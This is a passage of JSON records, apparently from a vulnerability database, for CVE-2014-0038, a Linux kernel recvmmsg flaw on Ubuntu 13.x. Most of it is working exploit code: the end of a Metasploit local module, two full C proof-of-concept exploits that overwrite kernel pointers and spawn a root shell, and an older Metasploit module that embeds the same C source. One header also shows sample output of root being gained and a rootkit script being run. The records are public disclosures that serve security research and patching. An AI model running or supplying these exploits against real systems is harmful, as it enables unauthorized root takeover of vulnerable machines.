end\n\n def exploit_data(file)\n ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-0038', file)\n end\n\n def live_compile?\n return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')\n\n if has_gcc?\n vprint_good 'gcc is installed'\n return true\n end\n\n unless datastore['COMPILE'].eql? 'Auto'\n fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.'\n end\n end\n\n def check\n arch = kernel_hardware\n unless arch.include? 'x86_64'\n vprint_error \"System architecture #{arch} is not supported\"\n return CheckCode::Safe\n end\n vprint_good \"System architecture #{arch} is supported\"\n\n version = kernel_version\n unless version.include? 'Ubuntu'\n vprint_error \"System kernel #{version} is not based on Ubuntu\"\n return CheckCode::Safe\n end\n vprint_good 'System kernel is based on Ubuntu'\n\n # Ubuntu 12.x kernels are not supported\n if version.include? 'precise'\n vprint_error \"System kernel #{version} is not exploitable\"\n return CheckCode::Safe\n end\n\n release = kernel_release\n unless release =~ /^3\\.11\\.0-(12|15)-generic/ || release.eql?('3.8.0-19-generic')\n vprint_error \"Kernel #{release} #{version} is not exploitable\"\n return CheckCode::Safe\n end\n vprint_good \"Kernel #{release} #{version} is exploitable\"\n\n CheckCode::Appears\n end\n\n def exploit\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n # Upload exploit executable\n executable_name = \".#{rand_text_alphanumeric rand(5..10)}\"\n executable_path = \"#{base_dir}/#{executable_name}\"\n if live_compile?\n vprint_status 'Live compiling exploit on system...'\n upload_and_compile executable_path, strip_comments(exploit_data('recvmmsg.c'))\n rm_f \"#{executable_path}.c\"\n else\n vprint_status 'Dropping pre-compiled exploit on system...'\n upload_and_chmodx executable_path, exploit_data('recvmmsg')\n end\n\n # Upload payload executable\n payload_path = \"#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n # Launch exploit\n timeout = 780\n print_status \"Launching exploit... May take up to 13 minutes. Start time: #{Time.now}\"\n output = cmd_exec \"echo '#{payload_path} & exit' | #{executable_path}\", nil, timeout\n output.each_line { |line| vprint_status line.chomp }\n print_status \"Cleaning up #{payload_path} and #{executable_path}...\"\n rm_f executable_path\n rm_f payload_path\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/recvmmsg_priv_esc.rb", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2022-05-04T17:46:22", "description": "", "cvss3": {}, "published": "2014-02-02T00:00:00", "type": "exploitdb", "title": "Linux Kernel 3.4 &lt; 3.13.2 (Ubuntu 13.04/13.10 x64) - &#039;CONFIG_X86_X32=y&#039; Local Privilege Escalation (3)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["2014-0038", "CVE-2014-0038"], "modified": "2014-02-02T00:00:00", "id": "EDB-ID:31347", "href": "https://www.exploit-db.com/exploits/31347", "sourceData": "/* \r\n*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*\r\nrecvmmsg.c - linux 3.4+ local root (CONFIG_X86_X32=y)\r\nCVE-2014-0038 / x32 ABI with recvmmsg\r\nby rebel @ irc.smashthestack.org\r\n-----------------------------------\r\n\r\ntakes about 13 minutes to run because timeout->tv_sec is decremented\r\nonce per second and 0xff*3 is 765.\r\n\r\nsome things you could do while waiting:\r\n * watch http://www.youtube.com/watch?v=OPyZGCKu2wg 3 times\r\n * read https://wiki.ubuntu.com/Security/Features and smirk a few times\r\n * brew some coffee\r\n * stare at the countdown giggly with anticipation\r\n\r\ncould probably whack the high bits of some pointer with nanoseconds,\r\nbut that would require a bunch of nulls before the pointer and then\r\nreading an oops from dmesg which isn't that elegant.\r\n\r\n&net_sysctl_root.permissions is nice because it has 16 trailing nullbytes\r\n\r\nhardcoded offsets because I only saw this on ubuntu & kallsyms is protected\r\nanyway..\r\n\r\nsame principle will work on 32bit but I didn't really find any major\r\ndistros shipping with CONFIG_X86_X32=y\r\n\r\nuser@ubuntu:~$ uname -a\r\nLinux ubuntu 3.11.0-15-generic #23-Ubuntu SMP Mon Dec 9 18:17:04 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux\r\nuser@ubuntu:~$ gcc recvmmsg.c -o recvmmsg\r\nuser@ubuntu:~$ ./recvmmsg\r\nbyte 3 / 3.. ~0 secs left. \r\nw00p w00p!\r\n# id\r\nuid=0(root) gid=0(root) groups=0(root)\r\n# sh phalanx-2.6b-x86_64.sh\r\nunpacking..\r\n\r\n:)=\r\n\r\ngreets to my homeboys kaliman, beist, capsl & all of #social\r\n\r\nSat Feb 1 22:15:19 CET 2014\r\n% rebel %\r\n*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*\r\n*/\r\n\r\n#define _GNU_SOURCE\r\n#include <netinet/ip.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <sys/socket.h>\r\n#include <unistd.h>\r\n#include <sys/syscall.h>\r\n#include <sys/mman.h>\r\n#include <sys/types.h>\r\n#include <sys/stat.h>\r\n#include <fcntl.h>\r\n#include <sys/utsname.h>\r\n\r\n#define __X32_SYSCALL_BIT 0x40000000\r\n#undef __NR_recvmmsg\r\n#define __NR_recvmmsg (__X32_SYSCALL_BIT + 537)\r\n#define VLEN 1\r\n#define BUFSIZE 200\r\n\r\nint port;\r\n\r\nstruct offset {\r\n char *kernel_version;\r\n unsigned long dest; // net_sysctl_root + 96\r\n unsigned long original_value; // net_ctl_permissions\r\n unsigned long prepare_kernel_cred;\r\n unsigned long commit_creds;\r\n};\r\n\r\nstruct offset offsets[] = {\r\n {\"3.11.0-15-generic\",0xffffffff81cdf400+96,0xffffffff816d4ff0,0xffffffff8108afb0,0xffffffff8108ace0}, // Ubuntu 13.10\r\n {\"3.11.0-12-generic\",0xffffffff81cdf3a0,0xffffffff816d32a0,0xffffffff8108b010,0xffffffff8108ad40}, // Ubuntu 13.10\r\n {\"3.8.0-19-generic\",0xffffffff81cc7940,0xffffffff816a7f40,0xffffffff810847c0, 0xffffffff81084500}, // Ubuntu 13.04\r\n {NULL,0,0,0,0}\r\n};\r\n\r\nvoid udp(int b) {\r\n int sockfd;\r\n struct sockaddr_in servaddr,cliaddr;\r\n int s = 0xff+1;\r\n\r\n if(fork() == 0) {\r\n while(s > 0) {\r\n fprintf(stderr,\"\\rbyte %d / 3.. ~%d secs left \\b\\b\\b\\b\",b+1,3*0xff - b*0xff - (0xff+1-s));\r\n sleep(1);\r\n s--;\r\n fprintf(stderr,\".\");\r\n }\r\n\r\n sockfd = socket(AF_INET,SOCK_DGRAM,0);\r\n bzero(&servaddr,sizeof(servaddr));\r\n servaddr.sin_family = AF_INET;\r\n servaddr.sin_addr.s_addr=htonl(INADDR_LOOPBACK);\r\n servaddr.sin_port=htons(port);\r\n sendto(sockfd,\"1\",1,0,(struct sockaddr *)&servaddr,sizeof(servaddr));\r\n exit(0);\r\n }\r\n\r\n}\r\n\r\nvoid trigger() {\r\n open(\"/proc/sys/net/core/somaxconn\",O_RDONLY);\r\n\r\n if(getuid() != 0) {\r\n fprintf(stderr,\"not root, ya blew it!\\n\");\r\n exit(-1);\r\n }\r\n\r\n fprintf(stderr,\"w00p w00p!\\n\");\r\n system(\"/bin/sh -i\");\r\n}\r\n\r\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\r\n_commit_creds commit_creds;\r\n_prepare_kernel_cred prepare_kernel_cred;\r\n\r\n// thx bliss\r\nstatic int __attribute__((regparm(3)))\r\ngetroot(void *head, void * table)\r\n{\r\n commit_creds(prepare_kernel_cred(0));\r\n return -1;\r\n}\r\n\r\nvoid __attribute__((regparm(3)))\r\ntrampoline()\r\n{\r\n asm(\"mov $getroot, %rax; call *%rax;\");\r\n}\r\n\r\nint main(void)\r\n{\r\n int sockfd, retval, i;\r\n struct sockaddr_in sa;\r\n struct mmsghdr msgs[VLEN];\r\n struct iovec iovecs[VLEN];\r\n char buf[BUFSIZE];\r\n long mmapped;\r\n struct utsname u;\r\n struct offset *off = NULL;\r\n\r\n uname(&u);\r\n\r\n for(i=0;offsets[i].kernel_version != NULL;i++) {\r\n if(!strcmp(offsets[i].kernel_version,u.release)) {\r\n off = &offsets[i];\r\n break;\r\n }\r\n }\r\n\r\n if(!off) {\r\n fprintf(stderr,\"no offsets for this kernel version..\\n\");\r\n exit(-1);\r\n }\r\n\r\n mmapped = (off->original_value & ~(sysconf(_SC_PAGE_SIZE) - 1));\r\n mmapped &= 0x000000ffffffffff;\r\n\r\n srand(time(NULL));\r\n port = (rand() % 30000)+1500;\r\n\r\n commit_creds = (_commit_creds)off->commit_creds;\r\n prepare_kernel_cred = (_prepare_kernel_cred)off->prepare_kernel_cred;\r\n\r\n mmapped = (long)mmap((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);\r\n\r\n if(mmapped == -1) {\r\n perror(\"mmap()\");\r\n exit(-1);\r\n }\r\n\r\n memset((char *)mmapped,0x90,sysconf(_SC_PAGE_SIZE)*3);\r\n\r\n memcpy((char *)mmapped + sysconf(_SC_PAGE_SIZE), (char *)&trampoline, 300);\r\n\r\n if(mprotect((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_EXEC) != 0) {\r\n perror(\"mprotect()\");\r\n exit(-1);\r\n }\r\n \r\n sockfd = socket(AF_INET, SOCK_DGRAM, 0);\r\n if (sockfd == -1) {\r\n perror(\"socket()\");\r\n exit(-1);\r\n }\r\n\r\n sa.sin_family = AF_INET;\r\n sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);\r\n sa.sin_port = htons(port);\r\n\r\n if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {\r\n perror(\"bind()\");\r\n exit(-1);\r\n }\r\n\r\n memset(msgs, 0, sizeof(msgs));\r\n\r\n iovecs[0].iov_base = &buf;\r\n iovecs[0].iov_len = BUFSIZE;\r\n msgs[0].msg_hdr.msg_iov = &iovecs[0];\r\n msgs[0].msg_hdr.msg_iovlen = 1;\r\n\r\n for(i=0;i < 3 ;i++) {\r\n udp(i);\r\n retval = syscall(__NR_recvmmsg, sockfd, msgs, VLEN, 0, (void *)off->dest+7-i);\r\n if(!retval) {\r\n fprintf(stderr,\"\\nrecvmmsg() failed\\n\");\r\n }\r\n }\r\n\r\n close(sockfd); \r\n\r\n fprintf(stderr,\"\\n\");\r\n\r\n trigger();\r\n}", "sourceHref": "https://www.exploit-db.com/download/31347", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T17:46:22", "description": "", "cvss3": {}, "published": "2014-02-02T00:00:00", "type": "exploitdb", "title": "Linux Kernel 3.4 &lt; 3.13.2 (Ubuntu 13.10) - &#039;CONFIG_X86_X32&#039; Arbitrary Write (2)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["2014-0038", "CVE-2014-0038"], "modified": "2014-02-02T00:00:00", "id": "EDB-ID:31346", "href": "https://www.exploit-db.com/exploits/31346", "sourceData": "/*\r\n * Local root exploit for CVE-2014-0038.\r\n *\r\n * https://raw.github.com/saelo/cve-2014-0038/master/timeoutpwn.c\r\n *\r\n * Bug: The X86_X32 recvmmsg syscall does not properly sanitize the timeout pointer\r\n * passed from userspace.\r\n *\r\n * Exploit primitive: Pass a pointer to a kernel address as timeout for recvmmsg,\r\n * if the original byte at that address is known it can be overwritten\r\n * with known data.\r\n * If the least significant byte is 0xff, waiting 255 seconds will turn it into a 0x00.\r\n *\r\n * Restrictions: The first long at the passed address (tv_sec) has to be positive\r\n * and the second long (tv_nsec) has to be smaller than 1000000000.\r\n *\r\n * Overview: Target the release function pointer of the ptmx_fops structure located in\r\n * non initialized (and thus writable) kernel memory. Zero out the three most\r\n * significant bytes and thus turn it into a pointer to an address mappable in\r\n * user space.\r\n * The release pointer is used as it is followed by 16 0x00 bytes (so the tv_nsec\r\n * is valid).\r\n * Open /dev/ptmx, close it and enjoy.\r\n *\r\n * Not very beautiful but should be fairly reliable if symbols can be resolved.\r\n *\r\n * Tested on Ubuntu 13.10\r\n *\r\n * gcc timeoutpwn.c -o pwn && ./pwn\r\n *\r\n * Written by saelo\r\n */\r\n#define _GNU_SOURCE\r\n#include <netinet/ip.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <time.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <fcntl.h>\r\n#include <sys/socket.h>\r\n#include <sys/stat.h>\r\n#include <sys/syscall.h>\r\n#include <sys/wait.h>\r\n#include <sys/mman.h>\r\n\r\n#define __X32_SYSCALL_BIT 0x40000000\r\n#undef __NR_recvmmsg\r\n#define __NR_recvmmsg (__X32_SYSCALL_BIT + 537)\r\n\r\n#define BUFSIZE 200\r\n#define PAYLOADSIZE 0x2000\r\n#define FOPS_RELEASE_OFFSET 13*8\r\n\r\n/*\r\n * Adapt these addresses for your need.\r\n * see /boot/System.map* or /proc/kallsyms\r\n * These are the offsets from ubuntu 3.11.0-12-generic.\r\n */\r\n#define PTMX_FOPS 0xffffffff81fb30c0LL\r\n#define TTY_RELEASE 0xffffffff8142fec0LL\r\n#define COMMIT_CREDS 0xffffffff8108ad40LL\r\n#define PREPARE_KERNEL_CRED 0xffffffff8108b010LL\r\n\r\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\r\n\r\n/*\r\n * Match signature of int release(struct inode*, struct file*).\r\n *\r\n * See here: http://grsecurity.net/~spender/exploits/enlightenment.tgz\r\n */\r\nint __attribute__((regparm(3)))\r\nkernel_payload(void* foo, void* bar)\r\n{\r\n _commit_creds commit_creds = (_commit_creds)COMMIT_CREDS;\r\n _prepare_kernel_cred prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CRED;\r\n\r\n *((int*)(PTMX_FOPS + FOPS_RELEASE_OFFSET + 4)) = -1; // restore pointer\r\n commit_creds(prepare_kernel_cred(0));\r\n\r\n return -1;\r\n}\r\n\r\n/*\r\n * Write a zero to the byte at then given address.\r\n * Only works if the current value is 0xff.\r\n */\r\nvoid zero_out(long addr)\r\n{\r\n int sockfd, retval, port, pid, i;\r\n struct sockaddr_in sa;\r\n char buf[BUFSIZE];\r\n struct mmsghdr msgs;\r\n struct iovec iovecs;\r\n\r\n srand(time(NULL));\r\n\r\n port = 1024 + (rand() % (0x10000 - 1024));\r\n\r\n sockfd = socket(AF_INET, SOCK_DGRAM, 0);\r\n if (sockfd == -1) {\r\n perror(\"socket()\");\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n sa.sin_family = AF_INET;\r\n sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);\r\n sa.sin_port = htons(port);\r\n if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {\r\n perror(\"bind()\");\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n memset(&msgs, 0, sizeof(msgs));\r\n iovecs.iov_base = buf;\r\n iovecs.iov_len = BUFSIZE;\r\n msgs.msg_hdr.msg_iov = &iovecs;\r\n msgs.msg_hdr.msg_iovlen = 1;\r\n\r\n /*\r\n * start a seperate process to send a udp message after 255 seconds so the syscall returns,\r\n * but not after updating the timout struct and writing the remaining time into it.\r\n * 0xff - 255 seconds = 0x00\r\n */\r\n printf(\"clearing byte at 0x%lx\\n\", addr);\r\n pid = fork();\r\n if (pid == 0) {\r\n memset(buf, 0x41, BUFSIZE);\r\n\r\n if ((sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) {\r\n perror(\"socket()\");\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n sa.sin_family = AF_INET;\r\n sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);\r\n sa.sin_port = htons(port);\r\n\r\n printf(\"waiting 255 seconds...\\n\");\r\n for (i = 0; i < 255; i++) {\r\n if (i % 10 == 0)\r\n printf(\"%is/255s\\n\", i);\r\n sleep(1);\r\n }\r\n\r\n printf(\"waking up parent...\\n\");\r\n sendto(sockfd, buf, BUFSIZE, 0, &sa, sizeof(sa));\r\n exit(EXIT_SUCCESS);\r\n } else if (pid > 0) {\r\n retval = syscall(__NR_recvmmsg, sockfd, &msgs, 1, 0, (void*)addr);\r\n if (retval == -1) {\r\n printf(\"address can't be written to, not a valid timespec struct\\n\");\r\n exit(EXIT_FAILURE);\r\n }\r\n waitpid(pid, 0, 0);\r\n printf(\"byte zeroed out\\n\");\r\n } else {\r\n perror(\"fork()\");\r\n exit(EXIT_FAILURE);\r\n }\r\n}\r\n\r\nint main(int argc, char** argv)\r\n{\r\n long code, target;\r\n int pwn;\r\n\r\n /* Prepare payload... */\r\n printf(\"preparing payload buffer...\\n\");\r\n code = (long)mmap((void*)(TTY_RELEASE & 0x000000fffffff000LL), PAYLOADSIZE, 7, 0x32, 0, 0);\r\n memset((void*)code, 0x90, PAYLOADSIZE);\r\n code += PAYLOADSIZE - 1024;\r\n memcpy((void*)code, &kernel_payload, 1024);\r\n\r\n /*\r\n * Now clear the three most significant bytes of the fops pointer\r\n * to the release function.\r\n * This will make it point into the memory region mapped above.\r\n */\r\n printf(\"changing kernel pointer to point into controlled buffer...\\n\");\r\n target = PTMX_FOPS + FOPS_RELEASE_OFFSET;\r\n zero_out(target + 7);\r\n zero_out(target + 6);\r\n zero_out(target + 5);\r\n\r\n /* ... and trigger. */\r\n printf(\"releasing file descriptor to call manipulated pointer in kernel mode...\\n\");\r\n pwn = open(\"/dev/ptmx\", 'r');\r\n close(pwn);\r\n\r\n if (getuid() != 0) {\r\n printf(\"failed to get root :(\\n\");\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n printf(\"got root, enjoy :)\\n\");\r\n return execl(\"/bin/bash\", \"-sh\", NULL);\r\n}", "sourceHref": "https://www.exploit-db.com/download/31346", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-13T05:43:04", "description": "", "cvss3": {}, "published": "2016-10-11T00:00:00", "type": "exploitdb", "title": "Linux Kernel 3.13.1 - &#039;Recvmmsg&#039; Local Privilege Escalation (Metasploit)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0038", "2014-0038"], "modified": "2016-10-11T00:00:00", "id": "EDB-ID:40503", "href": "https://www.exploit-db.com/exploits/40503", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire \"msf/core\"\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = GoodRanking\r\n\r\n include Msf::Post::File\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Linux Kernel 3.13.1 Recvmmsg Privilege Escalation',\r\n 'Description' => %q{\r\n This module attempts to exploit CVE-2014-0038, by sending a recvmmsg\r\n system call with a crafted timeout pointer parameter to gain root.\r\n This exploit has offsets for 3 Ubuntu 13 kernels built in:\r\n 3.8.0-19-generic (13.04 default)\r\n 3.11.0-12-generic (13.10 default)\r\n 3.11.0-15-generic (13.10)\r\n This exploit may take up to 13 minutes to run due to a decrementing (1/sec)\r\n pointer which starts at 0xff*3 (765 seconds)\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'h00die <mike@shorebreaksecurity.com>', # Module\r\n 'rebel' # Discovery\r\n ],\r\n 'DisclosureDate' => 'Feb 2 2014',\r\n 'Platform' => [ 'linux'],\r\n 'Arch' => [ ARCH_X86, ARCH_X86_64 ],\r\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\r\n 'Targets' =>\r\n [\r\n [ 'Auto', { } ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => { 'WfsDelay' => 780, 'PrependFork' => true, },\r\n 'References' =>\r\n [\r\n [ 'EDB', '31347'],\r\n [ 'EDB', '31346'],\r\n [ 'CVE', '2014-0038'],\r\n [ 'URL', 'https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1453900']\r\n ]\r\n ))\r\n register_options(\r\n [\r\n OptString.new('WritableDir', [ true, 'A directory where we can write files (must not be mounted noexec)', '/tmp' ]),\r\n OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']])\r\n ], self.class)\r\n end\r\n\r\n def check\r\n def kernel_vuln?()\r\n os_id = cmd_exec('grep ^ID= /etc/os-release')\r\n if os_id == 'ID=ubuntu'\r\n kernel = Gem::Version.new(cmd_exec('/bin/uname -r'))\r\n case kernel.release.to_s\r\n when '3.11.0'\r\n if kernel == Gem::Version.new('3.11.0-15-generic') || kernel == Gem::Version.new('3.11.0-12-generic')\r\n vprint_good(\"Kernel #{kernel} is exploitable\")\r\n return true\r\n else\r\n print_error(\"Kernel #{kernel} is NOT vulnerable or NOT exploitable\")\r\n return false\r\n end\r\n when '3.8.0'\r\n if kernel == Gem::Version.new('3.8.0-19-generic')\r\n vprint_good(\"Kernel #{kernel} is exploitable\")\r\n return true\r\n else\r\n print_error(\"Kernel #{kernel} is NOT vulnerable or NOT exploitable\")\r\n return false\r\n end\r\n else\r\n print_error(\"Non-vuln kernel #{kernel}\")\r\n return false\r\n end\r\n else\r\n print_error(\"Unknown OS: #{os_id}\")\r\n return false\r\n end\r\n end\r\n\r\n if kernel_vuln?()\r\n return CheckCode::Appears\r\n else\r\n return CheckCode::Safe\r\n end\r\n end\r\n\r\n def exploit\r\n\r\n if check != CheckCode::Appears\r\n fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')\r\n end\r\n\r\n\r\n # direct copy of code from exploit-db. I removed a lot of the comments in the title area just to cut down on size\r\n\r\n recvmmsg = %q{\r\n /*\r\n *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*\r\n recvmmsg.c - linux 3.4+ local root (CONFIG_X86_X32=y)\r\n CVE-2014-0038 / x32 ABI with recvmmsg\r\n by rebel @ irc.smashthestack.org\r\n -----------------------------------\r\n */\r\n\r\n #define _GNU_SOURCE\r\n #include <netinet/ip.h>\r\n #include <stdio.h>\r\n #include <stdlib.h>\r\n #include <string.h>\r\n #include <sys/socket.h>\r\n #include <unistd.h>\r\n #include <sys/syscall.h>\r\n #include <sys/mman.h>\r\n #include <sys/types.h>\r\n #include <sys/stat.h>\r\n #include <fcntl.h>\r\n #include <sys/utsname.h>\r\n\r\n #define __X32_SYSCALL_BIT 0x40000000\r\n #undef __NR_recvmmsg\r\n #define __NR_recvmmsg (__X32_SYSCALL_BIT + 537)\r\n #define VLEN 1\r\n #define BUFSIZE 200\r\n\r\n int port;\r\n\r\n struct offset {\r\n char *kernel_version;\r\n unsigned long dest; // net_sysctl_root + 96\r\n unsigned long original_value; // net_ctl_permissions\r\n unsigned long prepare_kernel_cred;\r\n unsigned long commit_creds;\r\n };\r\n\r\n struct offset offsets[] = {\r\n {\"3.11.0-15-generic\",0xffffffff81cdf400+96,0xffffffff816d4ff0,0xffffffff8108afb0,0xffffffff8108ace0}, // Ubuntu 13.10\r\n {\"3.11.0-12-generic\",0xffffffff81cdf3a0,0xffffffff816d32a0,0xffffffff8108b010,0xffffffff8108ad40}, // Ubuntu 13.10\r\n {\"3.8.0-19-generic\",0xffffffff81cc7940,0xffffffff816a7f40,0xffffffff810847c0, 0xffffffff81084500}, // Ubuntu 13.04\r\n {NULL,0,0,0,0}\r\n };\r\n\r\n void udp(int b) {\r\n int sockfd;\r\n struct sockaddr_in servaddr,cliaddr;\r\n int s = 0xff+1;\r\n\r\n if(fork() == 0) {\r\n while(s > 0) {\r\n fprintf(stderr,\"\\rbyte %d / 3.. ~%d secs left \\b\\b\\b\\b\",b+1,3*0xff - b*0xff - (0xff+1-s));\r\n sleep(1);\r\n s--;\r\n fprintf(stderr,\".\");\r\n }\r\n\r\n sockfd = socket(AF_INET,SOCK_DGRAM,0);\r\n bzero(&servaddr,sizeof(servaddr));\r\n servaddr.sin_family = AF_INET;\r\n servaddr.sin_addr.s_addr=htonl(INADDR_LOOPBACK);\r\n servaddr.sin_port=htons(port);\r\n sendto(sockfd,\"1\",1,0,(struct sockaddr *)&servaddr,sizeof(servaddr));\r\n exit(0);\r\n }\r\n\r\n }\r\n\r\n void trigger() {\r\n open(\"/proc/sys/net/core/somaxconn\",O_RDONLY);\r\n\r\n if(getuid() != 0) {\r\n fprintf(stderr,\"not root, ya blew it!\\n\");\r\n exit(-1);\r\n }\r\n\r\n fprintf(stderr,\"w00p w00p!\\n\");\r\n system(\"/bin/sh -i\");\r\n }\r\n\r\n typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\r\n typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\r\n _commit_creds commit_creds;\r\n _prepare_kernel_cred prepare_kernel_cred;\r\n\r\n // thx bliss\r\n static int __attribute__((regparm(3)))\r\n getroot(void *head, void * table)\r\n {\r\n commit_creds(prepare_kernel_cred(0));\r\n return -1;\r\n }\r\n\r\n void __attribute__((regparm(3)))\r\n trampoline()\r\n {\r\n asm(\"mov $getroot, %rax; call *%rax;\");\r\n }\r\n\r\n int main(void)\r\n {\r\n int sockfd, retval, i;\r\n struct sockaddr_in sa;\r\n struct mmsghdr msgs[VLEN];\r\n struct iovec iovecs[VLEN];\r\n char buf[BUFSIZE];\r\n long mmapped;\r\n struct utsname u;\r\n struct offset *off = NULL;\r\n\r\n uname(&u);\r\n\r\n for(i=0;offsets[i].kernel_version != NULL;i++) {\r\n if(!strcmp(offsets[i].kernel_version,u.release)) {\r\n off = &offsets[i];\r\n break;\r\n }\r\n }\r\n\r\n if(!off) {\r\n fprintf(stderr,\"no offsets for this kernel version..\\n\");\r\n exit(-1);\r\n }\r\n\r\n mmapped = (off->original_value & ~(sysconf(_SC_PAGE_SIZE) - 1));\r\n mmapped &= 0x000000ffffffffff;\r\n\r\n srand(time(NULL));\r\n port = (rand() % 30000)+1500;\r\n\r\n commit_creds = (_commit_creds)off->commit_creds;\r\n prepare_kernel_cred = (_prepare_kernel_cred)off->prepare_kernel_cred;\r\n\r\n mmapped = (long)mmap((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);\r\n\r\n if(mmapped == -1) {\r\n perror(\"mmap()\");\r\n exit(-1);\r\n }\r\n\r\n memset((char *)mmapped,0x90,sysconf(_SC_PAGE_SIZE)*3);\r\n\r\n memcpy((char *)mmapped + sysconf(_SC_PAGE_SIZE), (char *)&trampoline, 300);\r\n\r\n if(mprotect((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_EXEC) != 0) {\r\n perror(\"mprotect()\");\r\n exit(-1);\r\n }\r\n\r\n sockfd = socket(AF_INET, SOCK_DGRAM, 0);\r\n if (sockfd == -1) {\r\n perror(\"socket()\");\r\n exit(-1);\r\n }\r\n\r\n sa.sin_family = AF_INET;\r\n sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);\r\n sa.sin_port = htons(port);\r\n\r\n if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {\r\n perror(\"bind()\");\r\n exit(-1);\r\n }\r\n\r\n memset(msgs, 0, sizeof(msgs));\r\n\r\n iovecs[0].iov_base = &buf;\r\n iovecs[0].iov_len = BUFSIZE;\r\n msgs[0].msg_hdr.msg_iov = &iovecs[0];\r\n 